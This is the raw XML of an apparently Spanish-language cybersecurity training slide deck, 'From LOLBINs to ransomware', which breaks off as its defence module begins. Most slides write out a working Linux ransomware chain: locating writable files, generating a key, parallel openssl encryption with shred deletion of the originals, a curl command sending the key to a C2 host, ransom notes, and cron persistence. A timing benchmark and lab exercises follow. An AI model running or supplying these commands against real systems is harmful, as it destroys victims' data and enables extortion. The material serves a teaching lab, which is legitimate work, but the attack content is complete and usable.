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Layouts/slideLayout11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32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39.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/customXml/itemProps2.xml" ContentType="application/vnd.openxmlformats-officedocument.customXmlProperties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6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/customXml/itemProps3.xml" ContentType="application/vnd.openxmlformats-officedocument.customXmlPropertie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7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Slides/notesSlide15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notes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4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/docProps/custom.xml" ContentType="application/vnd.openxmlformats-officedocument.custom-properties+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide2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26.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/theme/theme2.xml" ContentType="application/vnd.openxmlformats-officedocument.them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2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presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/>
  <Override PartName="/ppt/slides/slide21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29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4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12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="es-CL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1" d="100"/>
          <a:sy n="61" d="100"/>
        </p:scale>
        <p:origin x="270" y="66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 /><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml" /><Relationship Id="rId47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 ?>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 ?>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 ?>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 ?>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 ?>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 ?>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 ?>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961C5E-A9A0-4861-1BD3-14D86FDD2B4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A772AD-756A-8896-2365-AD7A824E512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19F4C7E-EFD4-3386-55AF-AFFA0A4D985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33CC323-3B4A-793C-C5CB-AB2557A5113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BCE1682-4221-C5C7-D52A-D0134C3B012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CB3471F-EBBB-AC11-3D95-6F41AE9DCA9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633C070-D2EC-7BD6-BF8B-CE88F2BC857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CA7FF99-B794-A0DD-4A6A-12A360E4D42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BEC6B6-FD34-E5AF-A99D-EC7C6758AE9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A94BB0-A45A-13DA-9F65-A6FA3905928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5566657-EAF3-9C2C-5B45-FC9B2C619BE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05819EC-8A18-14E4-329F-AD57C156719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6E95C88-18DF-50B7-A932-ECEFCA14667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AAE2F89-D3AA-FFE5-255B-8C55BDAB690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607CC5B-F42A-BBB9-CCD9-2CAC9BA8138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C4F689C-ED90-E041-4226-6DC5E35755A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D6CD663-F684-7C9F-2CE1-938A100C304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5E0283E-6FDE-6511-DC5C-6D5A605B051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E734FD-12B2-4925-EA3C-B313C2E514E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7FD93B-D715-BCB5-EC23-BB734F05358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7F9225-4EEB-7AE2-7AAA-1F58012DF97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12ED8A-4024-84B8-6DC7-207FF8CA864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1B3806-96AD-112B-2C16-1C71DCFE6C7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E8E850E-C334-ABB6-C6C5-232A4106E0E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D334E2-789A-697C-03AF-72065E7D59C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14002A0-83C7-AD32-5FAA-B0126CB540B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B9AC2C3-B0D2-17D4-6C8D-DA9A278AC55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EE92EF-738A-051E-E46E-38C3B2B239B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652D7F-EFAC-A4DC-4F1E-5DE3BC7B1C7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C7027D-E3AC-93A9-94CA-1C1DE02993C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8A11C7-7401-1521-B499-A14660CDD00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897D37C-3BA8-8730-DAC3-943A5F7ED38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4612A9B-0EC5-2BF1-FE1C-F2E65387084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D83965-EA6E-CF11-9A17-287C042ECE5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A165F5C-C9DC-F198-29F3-07EABAC077E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287915-EEC8-B512-8577-F7BD1E64E44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0D8F781-ED29-CDFF-6F23-E300DE73EC4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2451D7C-7B9A-5EA4-C7E3-041A2C3B58A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E025791-D474-D5BB-EC00-800D778442F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D54CBEA-5CF7-1750-4964-0956736B035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iapositiva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8395339" name="Título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00907730" name="Subtítulo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1736449556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51CA1A-9417-4152-8B14-5E1F33E5CD22}" type="datetimeFigureOut">
              <a:rPr lang="es-CL"/>
              <a:t>26-03-2026</a:t>
            </a:fld>
            <a:endParaRPr lang="es-CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230147758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288919595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0C9413-A7E0-46F4-835A-35650BF60245}" type="slidenum">
              <a:rPr lang="es-CL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ítulo y texto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618245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21365909" name="Marcador de texto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CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1831348954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51CA1A-9417-4152-8B14-5E1F33E5CD22}" type="datetimeFigureOut">
              <a:rPr lang="es-CL"/>
              <a:t>26-03-2026</a:t>
            </a:fld>
            <a:endParaRPr lang="es-CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2082581811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498310586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0C9413-A7E0-46F4-835A-35650BF60245}" type="slidenum">
              <a:rPr lang="es-CL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Título vertical y tex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9963154" name="Título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915537732" name="Marcador de texto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CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1794387909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51CA1A-9417-4152-8B14-5E1F33E5CD22}" type="datetimeFigureOut">
              <a:rPr lang="es-CL"/>
              <a:t>26-03-2026</a:t>
            </a:fld>
            <a:endParaRPr lang="es-CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1606628984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914850830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0C9413-A7E0-46F4-835A-35650BF60245}" type="slidenum">
              <a:rPr lang="es-CL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ítulo y objet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2159876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554912283" name="Marcador de conteni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CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88840622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51CA1A-9417-4152-8B14-5E1F33E5CD22}" type="datetimeFigureOut">
              <a:rPr lang="es-CL"/>
              <a:t>26-03-2026</a:t>
            </a:fld>
            <a:endParaRPr lang="es-CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1522868006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13173655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0C9413-A7E0-46F4-835A-35650BF60245}" type="slidenum">
              <a:rPr lang="es-CL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Encabezado de secció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0142163" name="Título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2119545024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1673679096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51CA1A-9417-4152-8B14-5E1F33E5CD22}" type="datetimeFigureOut">
              <a:rPr lang="es-CL"/>
              <a:t>26-03-2026</a:t>
            </a:fld>
            <a:endParaRPr lang="es-CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81046936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301555433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0C9413-A7E0-46F4-835A-35650BF60245}" type="slidenum">
              <a:rPr lang="es-CL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os objet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1292733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150196818" name="Marcador de contenido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CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1475354660" name="Marcador de contenido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CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662964334" name="Marcador de fech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51CA1A-9417-4152-8B14-5E1F33E5CD22}" type="datetimeFigureOut">
              <a:rPr lang="es-CL"/>
              <a:t>26-03-2026</a:t>
            </a:fld>
            <a:endParaRPr lang="es-CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592156386" name="Marcador de pie de pá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820984639" name="Marcador de número de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0C9413-A7E0-46F4-835A-35650BF60245}" type="slidenum">
              <a:rPr lang="es-CL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ació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8865260" name="Título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196354815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1322028700" name="Marcador de contenido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CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208248841" name="Marcador de texto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644192050" name="Marcador de contenido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CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2000150688" name="Marcador de fech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51CA1A-9417-4152-8B14-5E1F33E5CD22}" type="datetimeFigureOut">
              <a:rPr lang="es-CL"/>
              <a:t>26-03-2026</a:t>
            </a:fld>
            <a:endParaRPr lang="es-CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1920121460" name="Marcador de pie de página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516928658" name="Marcador de número de diapositiva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0C9413-A7E0-46F4-835A-35650BF60245}" type="slidenum">
              <a:rPr lang="es-CL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Solo el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6968548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732236891" name="Marcador de fech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51CA1A-9417-4152-8B14-5E1F33E5CD22}" type="datetimeFigureOut">
              <a:rPr lang="es-CL"/>
              <a:t>26-03-2026</a:t>
            </a:fld>
            <a:endParaRPr lang="es-CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="659810146" name="Marcador de pie de página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50562361" name="Marcador de número de diapositiva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0C9413-A7E0-46F4-835A-35650BF60245}" type="slidenum">
              <a:rPr lang="es-CL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En blanc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082186" name="Marcador de fech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51CA1A-9417-4152-8B14-5E1F33E5CD22}" type="datetimeFigureOut">
              <a:rPr lang="es-CL"/>
              <a:t>26-03-2026</a:t>
            </a:fld>
            <a:endParaRPr lang="es-CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215806017" name="Marcador de pie de página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2097166219" name="Marcador de número de diapositiva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0C9413-A7E0-46F4-835A-35650BF60245}" type="slidenum">
              <a:rPr lang="es-CL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ido con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6819879" name="Títu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594565090" name="Marcador de contenido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CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1315535711" name="Marcador de tex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1675303596" name="Marcador de fech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51CA1A-9417-4152-8B14-5E1F33E5CD22}" type="datetimeFigureOut">
              <a:rPr lang="es-CL"/>
              <a:t>26-03-2026</a:t>
            </a:fld>
            <a:endParaRPr lang="es-CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1358237988" name="Marcador de pie de pá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413824243" name="Marcador de número de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0C9413-A7E0-46F4-835A-35650BF60245}" type="slidenum">
              <a:rPr lang="es-CL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Imagen con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1313884" name="Títu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563501498" name="Marcador de posición de imagen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s-CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1978765733" name="Marcador de tex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1733278503" name="Marcador de fech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51CA1A-9417-4152-8B14-5E1F33E5CD22}" type="datetimeFigureOut">
              <a:rPr lang="es-CL"/>
              <a:t>26-03-2026</a:t>
            </a:fld>
            <a:endParaRPr lang="es-CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1999196812" name="Marcador de pie de pá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924318846" name="Marcador de número de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0C9413-A7E0-46F4-835A-35650BF60245}" type="slidenum">
              <a:rPr lang="es-CL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7737421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610207229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CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1618602921" name="Marcador de fecha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6151CA1A-9417-4152-8B14-5E1F33E5CD22}" type="datetimeFigureOut">
              <a:rPr lang="es-CL"/>
              <a:t>26-03-2026</a:t>
            </a:fld>
            <a:endParaRPr lang="es-CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1866876205" name="Marcador de pie de página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57201853" name="Marcador de número de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FE0C9413-A7E0-46F4-835A-35650BF60245}" type="slidenum">
              <a:rPr lang="es-CL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jp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jp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2028193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Que coman tierra</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1677212849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De LOLBINs a ransomware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Diplomados Ciberseguridad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843592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find: el reconocimiento</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1375413999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Mapear todos los archivos de valor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find / -type f -writable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\( -name "*.txt" -o -name "*.pdf"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-o -name "*.docx" -o -name "*.db" \)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-print0 &gt; /tmp/.targets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Rápido. Silencioso. Está en cualquier Linux.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816010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xargs: el multiplicador de fuerza</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="816625199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/>
              <a:t>find localiza. xargs paraleliza.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Secuencial - un archivo a la vez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while IFS= read -r f; do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openssl enc -aes-256-cbc -in "$f" -out "${f}.enc"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done &lt; /tmp/.targets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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Paralelo - todos los cores, al mismo tiempo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find /home/victim -type f -writable -print0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openssl enc -aes-256-cbc -pbkdf2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-pass file:/tmp/.key -in {} -out {}.enc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>-P $(nproc) = un proceso por core. En 16 cores: miles de archivos en segundos.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631774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La ventana de detección se cierra</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295102399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/>
              <a:t>Benchmark real — root, servidor, xargs -P 36:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Un backup en tiempo real típico tiene una ventana de 5 minutos. El atacante termina antes.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1160193233" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="3625200"/>
          <a:ext cx="10515600" cy="24750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628900"/>
                <a:gridCol w="7886700"/>
              </a:tblGrid>
              <a:tr h="495000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Fase</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B0000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Tiempo</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="495000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Reconocimiento de dirs escribibles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&lt; 1s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95000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Reconocimiento de archivos objetivo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&lt; 1s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495000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Cifrado + shred (xargs -P 36)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1m 49s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95000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Notas de rescate en todos los dirs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&lt; 1s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331610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Módulo 3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1387606229" name="Text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 b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anatomía de un ataque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320551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Las 7 fases</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86253541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 lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Reconocimiento - find -writable mapea objetivos</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Generación de clave - openssl rand crea clave efímera</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Cifrado paralelo - find | xargs -P cifra todo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Destrucción - shred -u elimina los originales</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Exfiltración - curl envía la clave al atacante</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Rescate - echo / wall notifica a la víctima</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Persistencia - cron re-cifra lo que se recupere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793582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Generación de clave</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621952284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Clave AES-256 efímera - 32 bytes aleatorios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KEY=$(openssl rand -hex 32)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>La clave nunca toca disco en claro si se exfiltra inmediatamente.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Sin clave = sin recuperación.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771935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Cifrado + destrucción</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1324770701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printf '%s\0' "${TARGETS[@]}"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'openssl enc -aes-256-cbc -pbkdf2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-pass pass:$KEY -in "$1" -out "$1.enc"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&amp;&amp; shred -u "$1"' _ %</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>shred sobreescribe el archivo varias veces antes de borrarlo. No hay recuperación forense.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531121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Exfiltración de clave</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352010268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curl -sk "https://$C2/?k=$KEY&amp;v=$(curl -s4 ifconfig.me)"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Una sola petición HTTPS saliente. Difícil de distinguir de tráfico legítimo.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Una vez enviada: la víctima no puede descifrar sin pagar.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086836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Persistencia</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1720495117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(crontab -l 2&gt;/dev/null; echo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"*/5 * * * * find /home -type f -writable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-newer /tmp/.key -print0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openssl enc -aes-256-cbc -pbkdf2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-pass pass:$KEY -in {} -out {}.enc")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| crontab -</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Cada 5 minutos: cualquier archivo nuevo que aparezca, cifrado.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890569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Módulo 4</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="891854296" name="Text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 b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lab: "Preparando el plato"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82025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Que coman tierra</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1446157083" name="Text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De LOLBINs a ransomware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Taller de seguridad ofensiva y defensiva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832801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Entorno del lab</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156150061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 lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>VM Ubuntu/Debian aislada (sin red real)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Usuario no-root con home poblado de archivos de prueba</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Snapshot limpio listo para restaurar entre ejercicios</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Nunca ejecutar fuera de esta VM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891539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Ejercicio 1: Reconocimiento</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489362516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find /home/victim -type f -writable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\( -name "*.txt" -o -name "*.pdf" -o -name "*.docx" \)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&gt; /tmp/.targets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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wc -l /tmp/.targets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>¿Cuántos archivos encontraste? ¿En cuánto tiempo?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959089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Ejercicio 2: Generar clave</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1317191753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openssl rand -base64 32 &gt; /tmp/.key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cat /tmp/.key</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Esta es la clave que "el atacante" se lleva. Sin ella, no hay descifrado.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047618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Ejercicio 3: Sentir la diferencia</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051264532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/>
              <a:t>Primero mide la versión lenta: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time while IFS= read -r f; do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openssl enc -aes-256-cbc -pbkdf2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-in "$f" -out "${f}.enc" -pass file:/tmp/.key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shred -u "$f"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done &lt; /tmp/.targets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Luego restaura el snapshot y mide la versión real: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time find /home/victim -type f -writable -print0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'openssl enc -aes-256-cbc -pbkdf2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-pass file:/tmp/.key -in "$1" -out "$1.enc"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&amp;&amp; shred -u "$1"' _ {}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597414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Ejercicio 3: La pregunta clave</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207821791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/>
              <a:t>¿En qué momento hubiera sido posible interrumpirlo?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>while loop: tienes 13 minutos — hay tiempo de detectar el spike de I/O y actuar</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>xargs -P 36: tienes &lt; 2 minutos — necesitas detección automática, no humana</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>tar | openssl: tienes &lt; 5 segundos — cuando llegas, ya terminó</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Con tarbulk: el único momento de intervención real es antes de que empiece — no durante.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="191824029" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="3625200"/>
          <a:ext cx="10515600" cy="24750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53571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Métrica</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B0000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while loop</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B0000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xargs -P 36</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B0000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`tar \</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B0000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openssl`</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="353571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Tiempo total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13m 40s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1m 49s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4.5s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53571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Archivos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3.301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3.301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3.470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353571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Archivos/segundo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~4 arch/s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~30 arch/s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~771 arch/s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53571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Speedup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—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7.5x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182x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353571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Output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3.301 .enc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3.301 .enc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1 blob (29 MB)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53574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Ventana de detección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13 min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&lt; 2 min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&lt; 10 segundos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138181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Ejercicio 4: Nota de rescate</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10059124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find / -type d -writable -print0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'echo "Tus archivos han sido cifrados.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Tienes 72 horas para pagar." &gt; "%/LEEME_URGENTE.txt"'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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wall /home/victim/LEEME_URGENTE.txt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210756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Ejercicio 5: Persistencia</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632035506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(crontab -l 2&gt;/dev/null; echo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"*/5 * * * * find /home/victim -name '*.txt'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-newer /tmp/.key -print0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openssl enc -aes-256-cbc -pbkdf2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-pass file:/tmp/.key -in {} -out {}.enc")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| crontab -</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Crea un archivo .txt nuevo. Espera 5 minutos. ¿Qué pasó?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172169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Ejercicio 6: Forense post-ataque</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566723760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¿Qué quedó en auth.log?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grep -E "openssl|shred|xargs" /var/log/syslog</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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¿Qué procesos corrieron?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last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journalctl --since "30 minutes ago" | grep -E "openssl|shred"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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¿Qué modificó crontab?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cat /var/spool/cron/crontabs/$(whoami)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>¿Hubo alguna señal detectable en tiempo real?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281776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Módulo 5</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2122634090" name="Text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 b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defensa: cómo no comer tierra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942634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El principio</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
